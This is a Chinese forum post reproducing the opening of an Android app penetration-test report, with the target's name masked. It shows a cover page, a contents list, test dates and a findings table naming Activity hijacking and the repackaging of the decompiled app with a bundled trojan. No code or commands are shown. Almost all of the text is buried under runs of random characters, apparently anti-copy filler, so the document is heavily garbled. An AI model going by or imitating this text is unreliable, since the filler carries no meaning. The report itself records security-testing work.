找回密码
 立即注册

QQ登录

只需一步,快速开始

欢迎中测联盟老会员回家,专门使用25年老域名强势回归
查看: 763|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
) l2 E8 D/ L+ L9 u) Q 1 _) s. ] }9 H2 H

0 l" t+ I3 e9 I. g* i ! S, W- r+ k; L) i4 u. I! N
( }2 }* Y/ q$ i! m/ \ ' x. }$ `' G# R }% n

1 i% o1 ~% H) w) o- J0 g 5 ^% X( M8 c5 J5 T
- [. H, R+ |! l , k$ l3 Z; g: K) D5 Y" x; x9 u

2 q2 P }& m: X I* U 8 X2 x1 t* S$ T- A0 D+ [ 文档编号:                ' c1 n3 X( g9 X( v$ t0 W% P+ M% i0 c/ `! K; E

# X9 I8 c' h9 X& ?- f1 X7 a7 U( K! K. |1 H5 @

" V& `6 M$ Y1 d9 o% C % D, h+ l+ l5 h" c# A* u$ d   5 ~4 S' R+ x1 W+ l7 V% j " U& G. c' t; O0 E4 s! f

2 q# p: W A* D( H6 c* U% A0 Q% {. A" h( H( L& I0 k5 c

& {. D: Y$ U- G& s' }" E6 l$ R0 x% h / H* j, ~0 m$ d3 A   : R$ }$ {* _3 T6 z1 Q$ p# }% A m6 C, j7 U7 }% Y- D

, m9 @/ z) y, s1 D. n % S- U! g* s/ R1 [& q. {

9 C( j; n1 y' A5 C4 Z # M6 {, M5 L) J+ u5 l. G   * v/ T' m9 W: \: [ % Z/ @- }" u" x) n0 G9 x `

; m1 \6 l% h$ K! u: U+ S6 ~7 y$ P( I/ C! T1 L% |) A( k- ^! @

1 U7 `+ O$ j; k5 v; `' m0 c! ^: A9 x! L' @$ d) B   6 A# w4 r0 v1 M9 g9 L% R 8 r: o3 g/ [* E8 S3 C

l3 J. W( n* h- c7 I! X0 G( p2 S! C' y

8 Z0 I5 U# m- U' i4 v$ g " U" A1 y# i7 n8 ^6 v$ `   ( G; E, o1 u: z6 _& g( l | . d0 O& y1 o0 @3 d. @

" z. ?' D b2 i. Z; w! t* g! _9 {) h# t: I" y/ E2 Q

' f( a/ q h( X. E7 C* w$ K# m2 T* j# N8 S5 v( f- M; G# @1 K 某某某APP渗透测试 : X- U+ h( c" m% H# K* b, K* Q* I) U- U1 ]- c3 _7 R

5 P S$ Y/ I4 h& u/ A9 ~" q/ G. K# V; M! z1 t

3 w! q1 O' I$ ~& B( ^ ) T* z7 ]& |. A* u7 o ^% o% F   ! k% s0 e" ^6 }+ k # O4 @: E5 Z# |$ h. @- D

6 c' b( B1 A9 {$ k) [. e" F% t% ~1 T* n6 u

5 K5 H* _. n1 H6 u 7 z9 I: N, p0 b8 [0 U   ( x8 Y$ t/ h! y3 r! i: C4 J. @ - {; l h/ E0 O

! k+ B) j8 L4 z4 p) p$ K7 o U; I: ^ / e2 ]4 Z1 U8 f( B; F5 D% F" E

. v0 |& X z0 m5 a+ f ! o* K; r, j+ ]. D4 j   ! l; Q0 T D# v* W- S ( R. W- q2 x' G* R! E& i% A

7 }# T# ~5 _; G9 N) X3 V5 h0 _0 p) p3 K3 j( A4 H

: i' R% j9 {( |9 |, W 7 u6 @3 W& O0 B   ' e, P5 X3 i2 {3 l# a& e! O ' J7 A) y* l- q' G8 T1 i3 X

* v7 {3 Z* ]9 Z4 F6 f' {" k) P" G- @$ ?( G# N5 x, w* ? U

! ?1 p# Y9 l6 M# z$ a ( t* ?; F$ v/ C( X7 s 技 术 报 告 # E, E* E5 W$ D6 d7 X 5 w' i4 ?' j- @+ M

B0 n$ ~0 P. l" e# h. k& r9 P# f! D; E) `# X" r$ S2 l

~( _8 a9 s0 Y6 A* j1 W 7 y E) w: [' ^( U   / {6 L" p7 {* i% e$ H1 `8 Y! X/ v/ P ) y; y* u+ f! Y/ Q

( k& Z" Z. P1 t* S * L- _7 w7 E4 W( p: N$ M

( I% P4 M; O9 M3 Z3 h; r+ ~ 8 z1 p+ s$ z# `5 r   : s( V. l, t; u. ~6 u. | 9 U8 \' d/ P5 | \( l2 Z, F: ^0 w R

; C8 r. [# h# K) Z% L& I# y6 c

% m, A9 M$ B k. ^/ p0 X. K 8 Q! R, ^& m! v+ z% a0 d7 K8 K   & v0 |6 B; i, r& Z % Y5 E' t8 c8 r D4 Y' ~1 E& I* A

# N3 }: F8 J+ ~$ E$ u' C ( i4 E2 H0 {& C8 F

" T- L0 y& y K, w; u9 s & f9 V B) }4 Q* |, }) j! s   8 B+ p9 |# C+ t& ?% ^, u ]& H: R4 G* I7 p, U5 E4 T

+ a+ f$ X, U, `! q( [ $ z) Q4 y" L) v5 G

/ b, k+ m+ B6 f3 r: k$ t0 n* u $ x8 s9 j( ]" m1 }   8 X- f) d+ e, n7 \: z0 L" n. Z3 o + \6 l. _$ K4 r: `

3 z" W2 P3 t: K8 | % a/ W+ t" s; @" S) O

; y. t' w0 G3 y5 ]) S( V! b/ R! n   $ x; c. O" z1 Y $ P0 \$ R& _4 m, i( i- H

* g+ \6 g% S: V6 y $ [- m; a2 v4 w2 j

E* c6 z% W6 R& y C2 g* q5 y8 \8 \; K   9 X9 e! Q" B, E$ @( c7 ^ F ( V$ n+ \# p4 N4 w& [

2 l7 K+ g7 h" T 4 p0 U0 c4 l. i; v3 S/ M" c% M. y

- H6 I0 w5 Y! D/ I - o) @4 W# O/ x# n! @2 B, b   7 a1 } u' p7 H: @ ! a1 n1 u) N3 j, Z9 c9 n

6 o0 j4 }6 Z! D* S* \: k& f + G1 y' i [" m& d6 G

! ~6 e, o# M. @! b% L+ G( d) y " X P p% V) d, O$ U1 {3 s* A* m9 Y   % b, R4 O4 Z% f' @; h8 w* [* F , I; ` k- s3 ^- h3 j O

( K. d n. i- k9 E u5 I9 u d+ y; a: S; C1 l& m- U

) J, O. L8 c4 I: T2 r8 @ 8 B u! u9 ]6 i$ H# {   " W. i4 l* H- v+ ?6 D0 B0 B! \ 3 I" {. a4 u. u- ^, L' Z

+ F$ E* M0 m/ r' Z5 f& H' c/ p7 ?; Q

% x% _- y9 ]+ S" T( t , q1 E; e0 ~9 D5 q9 V( ~   7 U$ [3 N6 j, p% |, l/ Y$ r ; S/ q8 j* q) u3 h1 T

! w8 k6 r2 w3 y$ [2 W6 `, z- u% a3 u1 k! w! u8 G

4 J. T8 z/ }& O& D* ~$ {: y4 ]+ `" V   5 y" L1 h2 C+ G. { $ U* ?1 Y) l3 m i. |

! e/ ]4 k/ w' U9 U% F/ H, s' A + C/ T9 _) p# Z) c8 k3 d( `1 o

- g& R) b, {5 z6 q2 N, I% k& }- S# U" \. d) w2 d: m$ e   - m$ x& R; S% {, G# k% |' H $ L+ L3 D/ @1 X% p) m6 E" n

4 o, U' f7 {* V- p6 {8 i5 Y1 s9 l, \, ~8 U

4 o% P$ J* N' s- ~ 9 d1 {9 B* i* S0 p! E   1 N9 K% s/ _% G8 l ( ~" S1 G0 x7 l* @% k; M# U

9 E% s5 k7 |2 |5 C! M3 {. y ' |3 x6 N: |- B

3 I7 j( f2 s( O3 n; o " N2 Z/ z* }0 ^ {; Q u" z4 n   & }* k( Y F! c3 ] : x9 F6 ?3 H4 g: W8 _8 i

: Z! e) [6 j+ A7 k/ E' _ - f- O+ @( c6 q$ q, x

3 E; G8 [* h+ X/ O5 r ( \8 H( F; L5 [4 d/ ?; M" S   : f- s! F* d9 o# w/ j 3 d; N0 y: q; Z

% J3 g* A( Z1 X, s - y. s1 X( ]$ y9 r

) B- ?. V. H d1 \! K3 A / h; T9 I" x6 O# o   * }# ^. K$ i& t- W$ E/ g$ y5 V X. ~' o

" ]$ i/ @! F* C8 A% R( x& F, C + Q; S6 S" H/ d. V

- H0 b' ^/ [, T6 R: t! K, I 4 |# Z6 s5 O! }   7 ~0 F4 g/ ?& I% Y1 G- L1 [$ d $ M4 r) G& ]$ `, J' a7 n

- X6 }& G5 C9 q) j3 e ! K& ~% l- _8 ^# I

( g- B/ n2 w6 t k( }3 Z ! I) E( E* n5 v2 P6 j! s 二〇二〇年 ) f0 Q" W; m8 k |) H4 v 3 L, h! u% Z2 F3 Z

; s# d. H: J! y9 P( u: r & }! ]% p- @) V9 R8 |% W$ p; N' F! p5 w
9 _: f" N' B# K: p9 H+ V6 y& S4 e
: C8 B4 p9 R1 b $ v Q+ y, k% ^2 {# B5 l; q
3 D; v! [5 u0 _5 ` P# p % d* o1 D t/ `8 R
6 ^5 k, \7 Z. o6 S* ^4 c5 u0 o # K7 R, u/ F8 Z1 {
9 n% _' f6 U n2 _8 z+ Q1 Y ( \1 t3 Y) p' T5 a% t3 G$ u) u8 e
) N) M- ?5 {+ W+ D: ~0 L: D# n3 |; \ 0 V# } Z) [6 p6 J
0 q# Z0 A- X4 {; u+ `9 q3 A/ n ) o: a3 B! ?9 R: b9 s3 Z& N1 v" ~
, u& m& O4 |3 Z" @' R( q 5 r& h' E0 U. G. s+ t" S# J

4 m0 |7 Y0 V2 S$ Z7 T% ~ ! g8 S! f3 N8 Q6 V' I6 }: S 目 录 3 x# }) n! x2 D : \1 R9 f% T& b- R

/ Q5 {+ C g4 O1 W T5 P. `2 m3 ^6 x + R8 {5 r/ I% N$ f- R' q* c9 k7 l1 L( t$ O' r

! s( E# a4 v) r + G1 P. O, g* b   % a$ Y0 k5 B, G# @3 t. T: o/ \ & j6 R- k. }( h1 t+ ?6 b

0 c4 d6 o4 b* w8 ?1 R( u* U3 F& v' w0 }- y0 ]! E

% D# C; Q/ ?/ I9 v* k6 s $ S1 f x3 m* y$ k+ V# S 1 概述... 3 6 S% r/ c; [7 f9 n' s $ W& H+ y4 W8 ?, k% N

! ?4 e' Q* \ _ D8 ^3 [* J ! ]- C3 T0 `3 ^$ c/ ?% S

0 Y6 u) _0 P1 D) F& {( m2 } , ~) c' w6 a L1 E, t/ ?7 q 1.2测试时间... 3 * b/ w* q ~9 X' ] 9 |: p+ e! F3 ?& P4 g2 |; I

3 K( F: m- r& |3 l! }* y / C9 W& k0 Q, P/ h- m. c/ f

- s: b% w, w; ~2 a5 l& [ : D6 i- G% N4 ^' X9 f9 v j k 1.3测试对象... 3 $ p" O/ A" ^7 v$ s: G6 n 6 _# B% V% _; X

* o0 ~! ^: N- h+ f 1 i0 Z) Y7 L4 B& q% ~

" b* M; w% k) k + T0 V# p- Z7 n: R; G 1.4测试结果... 3 9 S2 e2 I: S7 E- I t7 f0 z : z2 T, @* u- t: O6 T

7 h1 M1 M8 Y' U, x, r 7 a$ [* V2 t, C: {. T

$ T2 Y, h0 b+ x1 b3 g* q0 X' @0 k, u0 g 2 检测结果... 4 % x& e2 W; n3 p, P- e* Y* ^2 k+ B1 G

q) y4 B9 w$ r8 W6 q: p- `' w$ z9 e+ E6 S' ~% O& R8 _

0 I3 [* Y$ q/ G ! j/ \) L" d X: u6 r3 y 2.1 某某某... 4 1 |$ F6 O2 p, z% A) p! Q' B' Q ) y( X3 I7 j6 s# u" {2 d

0 D) N( i# e- }( M' u 8 a! L3 Z" `/ w$ V" {

4 S" V# o; y) j) F9 A, A3 e2 E+ S8 o- I8 `) O' M 2.1.1检测目标... 4 & g% I ]) C! w5 q( B# }! Y* | 0 F! d4 h4 {' t" }5 ^' v

# X) B8 I/ }# d8 `+ \3 R 2 y5 p$ p* Q. L# x. g* H# _: a4 k

3 X K$ Q+ V* m5 ?# n* W$ ?( Y4 M ; N# O" b" ?; g4 s 2.1.2检测结果... 4 & _* n; b; h7 p. z 6 ] u8 L. J) p( H( t

7 i) g4 E6 g2 R `; X9 j . a( R! `8 h/ t: x

* S" ^0 f7 J1 z( R0 y1 o/ n: R6 E. d2 C4 R3 j2 M 2.1.2.1. 4 5 E& H# b' X, t' J" o, { 0 R4 z2 T4 e1 L/ s/ @& ]7 o6 I

# z% H9 Q* g4 \/ e2 q 6 q4 p' K* a+ d2 l' x

) X/ v8 q$ d! ]% j. X0 f r " @" M4 O, l: x3 f) U2 i 2.1.2.2. 6 9 x7 z! a+ Z ` x: } 8 M' p- y( w; t2 q( m7 w( m' H% ~

) I7 I) Z. J/ K- q# L5 o7 d0 u; }

) d1 B. l) O( M# C! M$ j" g, r6 v0 k& A1 m 1 {5 s6 |& W# S8 J1 ? 3 U! s7 }2 [6 X' a

2 R( f* z7 E+ u7 j! C& t/ r ) b- o" T2 y$ a. W4 k' e' d
]' J/ ?- O2 x5 @& t% m 8 `4 W# v$ E D& M, r+ b# e
, W- k* h! t& E- k0 T + r$ x, J- Q2 i# o/ U& ^
: x4 o: {8 D, n* s 9 o2 f, {/ n; b9 T# {0 w1 p$ z
; E( L$ Y2 N- I2 X ; q/ s9 ]" ^/ E# [: A

1 C9 {; v4 X. d5 x$ x& q + b1 l* y% S5 R/ q+ f$ p 1 概述 * v% [+ L- ]8 ^. i ! D) W `* d3 b& L. E; N

. y! I) L- E! S7 u : U" d5 V6 |5 c; Y3 d( n

* I2 h7 {- J- Z% _$ x, C) A0 P# j+ R 1.2测试时间 / R3 z. e5 t4 s- \( O( d. k0 \4 K# j2 ]0 r5 |, E/ N

6 M. L- n- d e: N! I$ o1 e. m 1 U) v% g* S6 D( [, h# V7 P " w9 N* l+ b% @) C6 e$ }. g3 d1 E; y e6 U2 H4 \: l4 N/ V5 D" h& R' @/ _: F; r" N' J$ i' y1 |; D3 a$ }( U: {" p3 O, [( G, R! _( C+ D. o- o/ w( X+ U# H% f$ u8 g% h& T3 \+ Y5 C: ?5 F# z4 E8 M. O$ o, c8 U9 O; r, |* C9 m' U) g1 S; c9 r8 k f. L: y$ N0 F) N4 R% q3 x& {9 R# u2 e# c. `( J1 C4 k( L: ]9 g+ u8 Y8 {# j9 m4 B& D- J9 o( o9 ?( e; P& E" \& j3 d# X9 o; u: H1 \4 ]1 T# s* U& Y: J% f$ N# k5 ^2 ?; e. g J$ q- j0 X; ^+ @: O% y/ N0 b( p8 j Z: X9 f D: G* a1 Z1 P+ d$ ?7 ~. m6 V1 j# j# a! g! q& X1 S5 Q7 u3 D: J' w$ V4 A) G9 y9 \: {7 W0 D8 D) R! Y& r5 G; h4 L$ ]' L" y, [; w0 B% H$ ~5 r) `9 e% i; f1 K3 }# l; w' l- m$ J9 d, F8 q! l J( V7 r1 o6 e: a! l$ \% e3 r {8 S; G' F' R7 M" R9 R& @% |* @. I; z5 F0 H
: K1 F( V- F& g: `# a . R3 R8 N/ ~1 J: I

: f& n u, D: r2 c, C " {. L4 v8 s0 N! t 渗透测试时间 2 W- [" Q m$ {, {. U1 f% v% t' r0 E5 G" y1 C# e$ S6 @( o0 f) L1 g; V

, @, w3 P: i9 @. z/ e& U6 e - |* l! o. a$ ]+ @7 k! N0 i( a O
8 M& s1 e: E; S% O ) g# c9 H9 c/ t( s# I/ `9 U

0 _5 y% O4 w, b: V" k/ Y0 J ( C! _( K# e, C- U! a, w; g 起始时间 9 B8 s. V3 K0 s" x ?0 z" S- i' W

! D. M1 j; I- y& O3 G @3 O7 I% z# R" M
& X4 `9 `: g0 s) x7 h - K& e5 m5 n- ]# I+ V0 h

5 _8 A6 Z+ ^8 n: g2 ` 6 J5 V t9 J0 r 202046 ( H' e, c) x% K5 W; M- ? ; u, b9 u6 K7 j, T% _

6 K: s6 Q# M9 } : {1 k& e3 E/ r- Q
9 h T1 k c+ x/ h- s( p * |# \3 e0 |$ F. O

$ t) p( n0 a" w' W0 ^6 v# v% O2 [+ c* f 结束时间 8 k1 x; V n5 b, L ! Q) }7 j' g6 S- h

. x, q) m/ u$ W: P* {; O, n# q5 G* \/ G/ W/ L- Q2 w) f
5 \7 p" k# f3 |( |4 \& K! c6 O) N$ H2 h# ~/ A: o" R+ F5 u

+ }* H# l1 H, [# C% } : K. I8 s2 x# |6 q0 j$ d( L 202049 0 u- b* g7 M8 f& f w, q& H7 ^* J8 ~0 ^9 V! R

. d& a. @& ` P$ j ) J8 K! L5 o h0 x3 ]
+ {/ z1 n' U, ?+ w6 S $ l: S6 D& K5 Q( D

9 ^( U. [" T! e" G# B m8 p* \ / V) } ~: G1 `- m7 a+ s 1.3测试对象 : T0 j% c7 E; O2 |6 N0 X) ? ( N0 ?% K/ s* b. n4 g# M

; Z7 g: Y6 h3 | ( @" W( R6 n* G. l) `4 [4 e& B

- ] Q6 t7 X9 A& B9 R+ L % n( j4 M4 D! B% L6 z 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ( j2 j! P& n; V6 k ' Z n: @; S; h! `, t* V

8 k; [$ N1 |: X" I6 A : Z. w0 d0 k& t n3 Y+ z7 b. r

8 G; G5 H- r: I ( P2 G3 L# q/ G+ j3 a9 x: L9 @8 f 1-1 检测对象 5 {9 K9 X8 @9 p9 a( i 9 f+ o0 I5 r7 ?: o

- J8 F3 t r9 H$ V1 |% \ p ! h+ l* h' E7 z3 q3 } J3 n) W- U( B4 m0 I: D X# j# F; T* ?, G3 y2 p4 p; Q. ?! j, Y9 M# [. B$ z5 O+ x; i+ m# A( M8 I9 O$ u2 ^4 X" H2 P3 S: D7 y0 _2 _- t& T) L- L2 U4 N; ^1 f9 B0 N. L) }0 n. W4 F7 g% ^3 ~" L$ j9 X" n/ x' E. L2 Z1 i; U8 `4 m3 v0 p. y2 o/ J4 k8 S5 K- S! V5 ?3 t3 F9 d* N% X5 l% J" U1 p3 W! [2 G7 `1 o8 s# N0 F6 S/ {* q) b& Z5 ^) G! r+ p% t( i( Q7 W$ q9 d7 m$ \/ M9 K; k( L8 ~- @9 Y6 J* z7 k8 F5 [! J' `* i1 w" q( E3 U7 y9 R4 L7 |/ J( M4 W6 R0 v R7 e* ?8 B! Q; _! W6 V+ h. } d5 |' L, g6 z- d& L* V. L* \, m+ V3 ]. Y& G7 |: Q) t, O9 P6 B* A2 r9 |9 W& g2 f: K! B; P4 y& t4 x. T( S% |5 U* r$ k6 N0 ^$ y) Q: h, L" o, F4 F. [* x& T' T0 t8 p: Z5 q2 N, a. P, `7 I, Y) `$ R
+ S/ v d( F, G; Z. e5 S- f* w- r* x2 K 1 X5 M. y$ I& p+ l

" ^; y* H5 _7 T9 l1 G0 n2 ]* a% W! D% X 序号 * t8 t" Z7 E8 ?& X# U1 ], G" B. ]4 B9 {' f* e% G, ~ i) I

z7 B3 V* \( T2 x6 a' J/ g 6 a$ ?9 e$ e# s O) X
2 T3 q9 n7 J! }+ |2 A! G % M# e- n" u+ g C0 v( }

: ~+ I0 x+ k2 J1 u- d+ M% `8 Q/ L! R& F7 Y : v+ J! U) B6 g8 p& n7 j# f0 { 测试对象 % \0 t, o* x4 P" l - z. _6 V3 b! P D! n

V$ p( W- r4 m2 L: ] & i e7 Z. D* C$ \
6 z. d% P2 E' ?% C/ X( m' ?! k) J& e+ v8 }/ P2 h9 I

7 i8 B# K3 c) v4 P, Z% O m3 P- m! I7 P% Q: U 测试地址 / T/ G" S+ F5 I ( _/ a' g9 W1 _3 v

3 i1 z1 I. u0 P% P4 P5 a3 v; J ]9 l! w9 u0 e; u* W
- s$ M/ _. I/ K) A I3 F ; ]6 q w! ^. g

V& x M* @# n% R' y3 ?$ \/ Q8 M 3 a% k, Z8 R$ R' t; u: ]3 { 安全漏洞 9 h) r% J. ^* { Y7 R. b / H* u& m& {4 i: m

: X+ _. s: f* p7 P& e% a3 F - l. O) o" L/ m% X! _
+ g$ I4 h+ ?7 H0 ~) @/ s/ K: k* j8 [- H4 A* L; c$ g, R( v, b( ]

7 A0 o& R& ?' A0 b" ~! r- E, q 8 x Z2 {& ?. o/ @9 t# m) H 1 U# z6 i( f3 b% |% A* }1 r 8 B; q5 w' _" @5 t* A

5 B& R) o+ X3 ~8 Q% b9 x n' g Y8 Z# _ R$ E2 J8 }) w. a. ~, ^
0 e! m% F; o) K 2 V4 ]2 [) ~+ r

5 m) w; v( y' e4 m' t, Y& z ; `% ]2 Q/ j {' a Q 某某某安卓APP 9 ?3 k7 Z' F3 M # A$ a( A9 h& f6 F! c

+ i0 K" C: B1 i. P( S" R4 P! M5 v1 M( j8 w! Q6 j) G
( n* q! r4 R1 {+ E2 J6 P7 d! K& s' ~/ D* A4 b# M& g( R' `" E9 p

4 K5 `- }5 M1 @ 8 C+ d" d2 s6 U/ k! e0 L1 c   7 m9 e6 i6 ^1 ]2 I0 V3 J- L6 ? 1 O3 ^$ @2 O, b

$ {. U. Q7 w8 x9 a, u 3 R$ U% m# q# B
+ e- T8 {; x# X! K# a ] ; C6 u- y3 D9 x# B- v) P: U+ s

6 i3 u9 z! h7 F 2 C2 T u8 [: W' r; z 2 . F/ U8 l5 A1 p a; [$ W, f6 l, @! W0 h3 {0 w

* T; Z' v8 |; Z4 [4 c; } 8 \ }5 u# F9 P# K& N$ B
L+ N: N D$ o 1 U) d4 ^. N: k. \

5 x' y* `- \, ]2 G $ E% x7 ~, }5 t: s$ T# y7 g 1.4测试结果 1 A4 I- t" X! y$ F0 E! t8 S# I- z) H ?8 Z% O% R1 Z" z! A& N0 ~& }

8 H$ H+ b3 b' E, v) K $ V `: H6 `5 a' A# j# i) R

% J- B7 h- p1 I- ` 7 h8 z7 e2 I1 u! z9 s 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: * f: p4 }$ N! L, e% Y7 I$ v: N5 G+ b4 f, K

' {. k4 \8 Q4 f. ^) k% w. p) N( d+ d& N+ L: H1 L2 x# i h' a4 Q% Z

8 O. ^& C6 W! B0 R. l' |, B# g) z( \) ?9 D5 _   3 @ _. r7 c' P5 z; | ; Q0 Z7 Z( y5 w$ p8 N+ M" i

; {& Y! X9 h1 ?7 Q9 k6 {! x * o$ ~, ~% @, _$ m$ @# @! }
. R4 u. S2 E% R3 E+ e; F1 k; s9 f. i 0 v5 n; w& m1 c* q4 l7 J( D9 h+ u& @. S& j& P; G" t- }+ ~+ H: B3 y+ y% I( q) u( q7 y! C0 {7 p$ x1 [9 A' o: X6 W/ }4 u, n" C$ G! n% z) R8 u$ d* I3 I& G- ~* W# L- l9 Q5 S4 Z J* k1 j6 I7 C# s. Q5 \* J" j, p# o- Y3 R6 a2 B" C/ z% O- \/ \ ~6 x- t! L3 P! Z8 z7 B7 N9 k# C- N3 O; T6 x) @* X8 S! B+ O! o$ x/ Q7 [. h: Z& t, d" X8 }- d3 x; k$ Z9 E/ A) d3 B. I8 H* O* S" ?% W4 j0 r3 l* J8 Z# W5 H% ]8 T. e! |: {) N F- q W% D- r. E' J% O/ A$ x# E( q6 D+ P% L- c6 b* w( t/ P3 P8 [6 v. e1 a3 b" ?0 v- M$ M% N) B8 v: d0 l" e) n+ n. _) B5 _7 k' \% I( s" T$ {. ~+ Q7 }8 E8 W, d5 c7 Y2 e1 P# a; N9 H) E1 G7 V8 x! a. L2 m0 M- K0 d) |! b7 s9 Y$ o, H6 ?, \, }& u: m, E1 Q( N! X. A( g) b; x% L, b5 L: V/ Z; `* ^. H5 k( F* R/ G3 p( ^; ~$ f/ d; j* Q# T# }$ A6 l* Q; [9 m: ~- B) G/ r. `) F4 z3 i* c* l) J! x1 ^, C# c7 |# Q, ?0 a, s/ X6 q' D0 u* a1 T3 D* W& n. i4 \( q" E- |% f% L: E; D9 I0 I1 K3 c6 C' c% ?0 \1 H e0 P/ a6 H/ C& U/ E" U z+ o+ Y0 l9 y/ T8 P7 J; i7 T# {4 l! B3 G8 B: V; n5 N6 Z# [4 ]5 M3 f- ]: z' O8 q$ l H' m( l$ S0 K3 d. N2 |" b9 L: D. i, `* B6 v* K" I) m3 }' r+ _ C v; e' c+ q# X
" M7 A4 \9 X0 P/ I3 _/ T4 v( [% M 7 {9 S& ~, q+ w6 f" n5 l

0 `9 ^6 p) s7 c1 _) l2 t. y' L 0 L) A! `# m# h9 L. C2 C7 S# Z 序号 * S2 Q* Q0 p6 A7 U9 K6 [; g2 S+ x* \6 E+ c: B

2 t5 A- Q- D0 C/ r+ y+ D' { & x! x: }# R5 z1 h
+ q3 v. W+ P2 `9 n9 O% N. }( w L- { ' d' g O( P9 L( ^5 A _9 W3 m

) p: \; L6 n# q: }# F* z& K/ j 7 z5 X$ I' ]% F2 h8 L2 W 系统名称 ! Q7 F; v6 \: N3 g 6 B6 F K7 k, e& j% S- ?

. ]/ M: }) Z- A) x" T3 E8 b 4 h: O+ {( |3 o5 P: @6 H% H- Y
7 f2 A! m! t7 p0 ]6 ?! |8 p% _4 b

3 k1 T: w9 F' k- q; U/ X, I' ]1 w4 }9 U, Y9 K! T1 U) _0 I 漏洞名称 # S6 i( ]6 H S1 P" r ^4 V7 ~ 4 o3 ^+ [1 h E/ a6 w: ]3 }

5 r0 v# s& a) | : F; B+ l+ B. `
# y3 o: }* v% C# f) T/ G 8 Z+ m! M4 {6 I% W; h

! l+ i2 M4 |* n: q- \4 W( N2 n6 N* _; {/ P5 i) Z4 H% @7 y 漏洞危害 & V8 a0 B" u! W3 j4 S! q: ?7 F6 X2 Q4 S% b+ N

: x5 ?* {3 Q% o" f# F& g & }- ~% Y8 V1 A( ~- d. V
# e5 j; ~7 K6 _8 Y3 A* W; _8 |8 G 0 {! g4 |3 x+ P4 `7 J

. _; N$ z! q$ [- |3 e9 @) C 8 g8 n/ T. A" Q6 E$ O. H 修复结果 * k9 E8 |3 l$ h# o% D6 ^1 k/ f" T" N, h( l" C

# a, V1 f* v* e& M' |' K1 [ 9 f" l4 W6 l0 p b6 G( e
7 v2 \1 d* `% ]. \/ W 5 c' q& L# ?+ w& V1 _. H

4 t1 w. ]1 t$ }( m* r* p, X- ^3 K% }4 M/ I ' Z) ?/ _$ D+ x( \+ W, v, ~ 1 6 L6 f6 c' P1 G7 X: r3 j % M. b* K' _8 Y/ b

# j3 K$ ~& x7 y [ # V8 D% Y0 H. h6 y$ J- B5 i
* V s# W4 b- d+ C4 l2 d6 F( j; H9 z1 @) B5 ]' K, N

/ X- R9 C8 ~5 w V6 m! |7 d 1 k$ ?8 ~. a8 N" U 某某某某某某APP ' j" s' F b: W% h3 D + r: }% p) c9 y0 x2 Z

; { w0 A$ s# ^' B9 d+ r" Z" _0 q* N4 Z$ L
) z6 r- x7 @* I* g' ` & ^/ Y: o, X+ b- w7 e: r3 ~. y* d

/ R6 j- r$ l0 Z1 k- Q , Q! F$ x" ]# _: C, r! u8 W9 [ Activity 劫持 , y* O0 K0 R* M2 M! O" K ! M- ?" `1 {7 A4 Z

, v% n# z; c% z, ^: N1 }7 S! s 4 i: ]) K- b. \5 x" t

( n" R* q6 i0 i: O# ~8 B 4 s8 I2 \; S1 U$ l, a- d   - u3 e& d, X, t7 J% I9 U 3 @( l- e) P" H/ d

5 q1 ]( K# m( f6 j" y6 @ 0 C" _( J- ?" z2 [6 j0 H0 U) S5 e
/ O) ~. Q8 |# Y6 k$ D# {6 o # o8 ~, t; w6 q6 x- d! t

1 U/ L0 ]% l* f3 ]# a$ f / p, D4 O% G$ { - l- B" o! W" o+ N4 E- W+ h2 R& A. K9 d& b; W

6 Y# s- G2 P; |/ v2 z" i) e! z3 I' P6 Y / g' ?+ K/ L B# ?, l
5 U- p1 @ Y m. E' ^6 O' e) w% E1 S2 B$ ]) g: K

+ `) E5 C; X8 T2 `+ D1 P% k " m: ?% C4 o- [& u2 [+ J   1 F) W8 h+ h- r& x; {, B4 N9 l4 i& L k

: U# c. S4 X" ?# b8 G9 J( a J- ?! {, f" I' S
6 u/ I3 m& [. m$ U/ \$ m 9 A% t0 j/ j' |/ f" ^2 b* q$ ]

7 {8 s; j X6 E7 }; m1 Y - J& T' ^. i9 v8 G# E) W 2 4 {, Q/ F, |6 F1 A& E% H) M8 D+ W3 O- D3 O# s2 G+ _2 Z9 z, x8 I$ L

$ |5 j( B* m. ^2 k7 c % U; D/ q! ^* k0 h6 e5 ]# t& [
3 K+ ^. F- D3 m; n4 r* T7 c 5 A6 `+ k# `3 C5 S4 R

* _1 k- G( E/ p# q6 A7 w/ h 4 f0 {& ?0 J/ \* n8 v 某某某某某某APP , E, E- h, h4 R) u( M9 ^) ?+ Z- |2 i7 T; V" T% j

5 g9 W7 V9 Y* V / S+ T. z- { l* p9 U
9 O4 I9 t' H0 [" a6 | - _# I& `! p5 y

1 X# y- Y0 |, c0 u% ]6 L; Q0 C . V/ d! e+ D, ]0 M% z6 f3 V+ ]: P& h 反编译二次打包捆绑木马、篡改APP代码 m6 E- o8 w1 |4 H' o+ o " A ?9 C L" h: o+ g* s* d

' E5 q/ r0 T+ L: Y( }8 G , M1 ?: [7 ^) f; f- ?. N) ]
* \. F5 k1 ?4 }6 { % v' Z7 q# w& R. }# V( a g+ ]

- i9 M7 V' j$ A3 O0 C, U2 {) h# j1 Q7 V, u " F1 D% r) |! B! M8 s0 T* Y2 z X3 j6 t" H' S5 u/ v! j: q

4 ~7 `6 X1 H: l0 c& m 6 z; j* ]: H, {) @
! h1 \* u/ {1 h$ y9 X1 n/ d* W7 v/ `9 g# d8 k

* W, B2 i; W, h 7 P, L) ]3 v" y( l' B   $ ^0 F. t: l" S2 T+ ^ $ H- k2 R$ x! Y" q

) u. z+ |9 t1 [, i& l . s- O' X! p b
, @) Z1 q' E, ~9 g7 X" J4 g: w$ J & v4 c" f Y& `+ B
6 V M- V) f8 p, W1 h* ?- I" [

( R) M. f) c2 n$ ~$ Y' L & k8 D. x' g, v2 ?   . k2 P& \0 w7 M8 [% d5 B% @ % T% k1 E% _' ]

7 V) ?+ d! D) D* L3 t3 c& M" m& T% R( ^$ N" s0 v

: N9 C; w& j7 Q/ e8 U3 u2 R, |) R' W) E% d, v 1-2 测试结果 ! D& ` O i" r8 p: ?$ z 6 Z( r' C( u# u1 ^3 x

5 _. h2 d: i& O' ]- t2 G7 T ! x- d! @. K# u

W( @6 D( D4 [) ~: Q$ x + }* O6 e( C+ n) {. t1 o   - D* r t( s9 |! S% | / n/ q* b6 J7 F; J* d2 [: P: C

